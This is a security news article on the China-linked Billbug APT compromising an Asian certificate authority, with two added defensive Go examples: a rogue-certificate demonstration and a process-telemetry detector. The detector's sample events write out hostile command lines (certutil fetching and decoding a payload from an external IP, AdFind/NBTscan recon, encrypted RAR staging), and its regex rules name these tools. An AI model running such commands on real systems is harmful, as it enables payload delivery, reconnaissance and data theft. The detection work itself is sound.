China-linked APT Billbug compromises a certificate authority in Asia

Since March 2022, an APT group suspected of having links to China has compromised digital certificate authorities in Asia as part of a campaign against government agencies.

State-sponsored attackers have compromised a country’s digital certificate authority in Asia as part of a cyber-espionage campaign targeting multiple government agencies in the region, Symantec has warned.

Symantec attributed the attack to a China-linked cyber-espionage group tracked as Billbug (aka Lotus Blossom, Thrip). This attribution is based on the use of tools previously attributed to this APT group.

Symantec researchers first reported in 2019 that the group was using the backdoors Hannotog (Backdoor.Hannotog) and Sagerunex (Backdoor.Sagerunex); both were used again in this latest campaign.

“Victims of this campaign include certificate authorities as well as government and defense agencies,” reads the report published by Symantec. “All victims were in different countries in Asia. Billbug is known to focus on targeting in Asian countries. In at least one government victim, a large number of machines on the network were compromised by the attackers.”

Compromising a certificate authority could allow an attacker to issue valid code-signing certificates and use them to sign malware so that it passes signature-based trust checks. Fraudulently issued TLS certificates could likewise be used to intercept HTTPS traffic, because clients accept any certificate that chains to a trusted CA regardless of whether the CA was ever supposed to issue it.

The good news is that Symantec has seen no evidence that the attackers were able to compromise digital certificates. The security firm notified the certificate authority of the malicious activity.
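To make the risk concrete, the following Go program is an added example, not code from Symantec or Security Affairs. It builds a constructed root CA, issues a legitimate TLS certificate for the hypothetical host portal.gov.example, and then, using the same CA private key an intruder inside the CA would have, a second certificate for that host bound to an attacker-controlled key pair. Standard chain validation accepts both, which is exactly the interception scenario described above; comparing the leaf's SubjectPublicKeyInfo hash against a value pinned out of band is one client-side check that still tells them apart. All names and keys are generated inside the program.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"fmt"
	"math/big"
	"time"
)

// Scenario is a constructed root CA plus two leaves it signed for the same
// hypothetical host: the operator's real certificate and a rogue one minted
// by an attacker holding the CA key. Nothing here is real infrastructure.
type Scenario struct {
	Root, LegitLeaf, RogueLeaf *x509.Certificate
}

const Host = "portal.gov.example" // hypothetical government portal

// issue generates a P-256 key pair and certifies it under parent/parentKey;
// with parent == nil the certificate is self-signed (used for the root).
func issue(tmpl, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	signer := parentKey
	if parent == nil {
		parent, signer = tmpl, key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, signer)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// leafTemplate is an ordinary TLS server certificate for host.
func leafTemplate(serial int64, host string) *x509.Certificate {
	return &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: host},
		DNSNames:     []string{host},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(90 * 24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
}

// BuildScenario creates the CA and both leaves. The only thing the attacker
// needs for the rogue leaf is the CA private key; the key pair is theirs.
func BuildScenario() (*Scenario, error) {
	root, rootKey, err := issue(&x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "Example National CA (constructed)"},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(10 * 365 * 24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign,
	}, nil, nil)
	if err != nil {
		return nil, err
	}
	legit, _, err := issue(leafTemplate(2, Host), root, rootKey)
	if err != nil {
		return nil, err
	}
	rogue, _, err := issue(leafTemplate(3, Host), root, rootKey) // attacker-controlled key pair
	if err != nil {
		return nil, err
	}
	return &Scenario{Root: root, LegitLeaf: legit, RogueLeaf: rogue}, nil
}

// ChainValid is standard path validation, what a TLS client does. It accepts
// anything the trusted root signed, so it cannot tell the two leaves apart.
func ChainValid(leaf, root *x509.Certificate, host string) bool {
	roots := x509.NewCertPool()
	roots.AddCert(root)
	_, err := leaf.Verify(x509.VerifyOptions{Roots: roots, DNSName: host})
	return err == nil
}

// SPKIPin is the hex SHA-256 of the SubjectPublicKeyInfo. A client that pins
// the real server's SPKI rejects the rogue leaf even though its chain is valid.
func SPKIPin(cert *x509.Certificate) string {
	sum := sha256.Sum256(cert.RawSubjectPublicKeyInfo)
	return hex.EncodeToString(sum[:])
}

func main() {
	s, err := BuildScenario()
	if err != nil {
		panic(err)
	}
	pinned := SPKIPin(s.LegitLeaf) // recorded out of band from the genuine server
	for name, leaf := range map[string]*x509.Certificate{"legit": s.LegitLeaf, "rogue": s.RogueLeaf} {
		fmt.Printf("%-5s chain valid=%t pin matches=%t\n", name, ChainValid(leaf, s.Root, Host), SPKIPin(leaf) == pinned)
	}
}
```

Running it prints one line per leaf: both report chain valid=true and only the legitimate leaf reports pin matches=true. The same logic applies to a rogue code-signing certificate: signature verification checks that the chain reaches a trusted root, not whether that particular issuance was authorised, which is why CA operators rely on issuance monitoring and Certificate Transparency to notice unexpected certificates rather than invalid ones.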

The campaign has been going on since at least March 2022.

Analysis of the attack chain indicates that the attackers exploited public-facing applications to gain initial access to the victim networks.

The threat actors make extensive use of dual-use and living-off-the-land tools, as well as custom malware. Symantec lists the following tools used by this APT group:

  • AdFind – A publicly available tool for querying Active Directory. It has legitimate uses but is widely used by attackers to help map a network.
  • Winmail – Can open winmail.dat files.
  • WinRAR – An archive manager that can be used to archive or compress files, for example before exfiltration.
  • Ping – A freely available tool that allows users to determine whether a specific host on the network is responding.
  • Tracert – A network tool that can be used to determine the “path” a packet takes from one IP address to another. It reports the hostname, IP address, and response time of each hop.
  • Route – Displays or modifies the path along which packets are sent through an IP network to an address on another network (the host's routing table).
  • NBTscan – An open source command-line NetBIOS scanner.
  • Certutil – A Microsoft Windows utility that can be abused for various purposes, such as decoding data, downloading files, and installing browser root certificates.
  • Port scanner – Allows an attacker to determine which ports are open on the network and which may be used to send and receive data.
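The initial-access note and the tool list above map directly onto process-creation telemetry. The following Go program is an added example, not from the Symantec report or Security Affairs, that runs a handful of rules modelled on that list over constructed Sysmon-style process-creation events: certutil used to download or decode a payload, AdFind and NBTscan enumeration, ping/tracert/route reconnaissance, WinRAR creating a header-encrypted archive, and a web-server worker process spawning a child, the footprint left when a public-facing application is exploited. Host names, IP addresses and command lines in the sample are constructed; the three-behaviour threshold is an assumption to be tuned per environment.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Event is a normalised process-creation record (Sysmon Event ID 1 style).
type Event struct {
	Host, Parent, CmdLine string
}

// Rule ties a command-line pattern to one behaviour from the tool list.
type Rule struct {
	Name string
	Re   *regexp.Regexp
}

var Rules = []Rule{
	{"certutil_download", regexp.MustCompile(`(?i)\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b`)},
	{"certutil_decode", regexp.MustCompile(`(?i)\bcertutil(\.exe)?\b.*-decode\b`)},
	{"adfind_recon", regexp.MustCompile(`(?i)\badfind(\.exe)?\b`)},
	{"nbtscan_recon", regexp.MustCompile(`(?i)\bnbtscan(\.exe)?\b`)},
	{"icmp_recon", regexp.MustCompile(`(?i)\b(ping|tracert)(\.exe)?\s+\S`)},
	{"route_print", regexp.MustCompile(`(?i)\broute(\.exe)?\s+print\b`)},
	{"rar_encrypted_archive", regexp.MustCompile(`(?i)\b(win)?rar(\.exe)?\s+a\b.*\s-hp`)},
}

// webWorker matches parent images that should not spawn shells or LOLBins on
// a web server; a hit is the usual footprint of an exploited public-facing app.
var webWorker = regexp.MustCompile(`(?i)^(w3wp|httpd|nginx|tomcat\d*|php-cgi)(\.exe)?$`)

// SampleEvents is constructed telemetry: a noisy admin workstation, an exploited
// DMZ web server pulling a payload, and a domain controller being enumerated.
var SampleEvents = []Event{
	{"WS-0412", "cmd.exe", `ping -n 1 fileserver01`},
	{"WS-0412", "cmd.exe", `route print`},
	{"WEB-DMZ-02", "w3wp.exe", `cmd.exe /c certutil.exe -urlcache -split -f http://203.0.113.10/up.txt c:\windows\temp\up.txt`},
	{"WEB-DMZ-02", "cmd.exe", `certutil -decode c:\windows\temp\up.txt c:\windows\temp\s.exe`},
	{"DC-01", "cmd.exe", `adfind.exe -f "objectcategory=computer" -csv name operatingSystem`},
	{"DC-01", "cmd.exe", `nbtscan 10.20.0.0/24`},
	{"DC-01", "cmd.exe", `rar.exe a -r -hpSecret123 c:\windows\temp\out.rar c:\users\`},
}

// Match returns the names of every rule an event trips, including the
// parent-process check.
func Match(e Event) []string {
	var hits []string
	if webWorker.MatchString(e.Parent) {
		hits = append(hits, "webserver_spawned_process")
	}
	for _, r := range Rules {
		if r.Re.MatchString(e.CmdLine) {
			hits = append(hits, r.Name)
		}
	}
	return hits
}

// ScoreHosts collects the distinct behaviours seen per host (sorted for stable
// output). Correlating per host separates an admin's single ping from an
// operator walking through recon, payload staging and exfiltration prep.
func ScoreHosts(events []Event) map[string][]string {
	seen := map[string]map[string]bool{}
	for _, e := range events {
		for _, h := range Match(e) {
			if seen[e.Host] == nil {
				seen[e.Host] = map[string]bool{}
			}
			seen[e.Host][h] = true
		}
	}
	out := map[string][]string{}
	for host, set := range seen {
		names := make([]string, 0, len(set))
		for n := range set {
			names = append(names, n)
		}
		sort.Strings(names)
		out[host] = names
	}
	return out
}

// Suspicious alerts on any certutil misuse, or on three or more distinct
// behaviours on one host (the threshold is an assumption; tune it per estate).
func Suspicious(hits []string) bool {
	for _, h := range hits {
		if strings.HasPrefix(h, "certutil_") {
			return true
		}
	}
	return len(hits) >= 3
}

func main() {
	for host, hits := range ScoreHosts(SampleEvents) {
		fmt.Printf("%-11s suspicious=%-5t %v\n", host, Suspicious(hits), hits)
	}
}
```

On the sample, WS-0412 trips only the ping and route rules and stays below the threshold, WEB-DMZ-02 alerts immediately on the certutil download chain spawned under w3wp.exe, and DC-01 alerts on AdFind plus NBTscan plus an encrypted RAR being built, the recon-then-staging sequence the report describes.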

The APT group also uses an open source multi-level proxy tool called Stowaway to proxy external traffic to the internal network.

The group also deployed Cobalt Strike, a penetration testing framework that many consider commodity malware because of how frequently it is abused by malicious actors.

“The targeting of government victims is likely motivated by espionage, and certificate authorities may be aimed at stealing legitimate digital certificates, as mentioned in the introduction,” the researchers concluded. “This attacker’s ability to compromise multiple victims simultaneously demonstrates that this threat group remains a skilled and well-resourced operator capable of sustained and widespread campaigns.”


Pierluigi Paganini
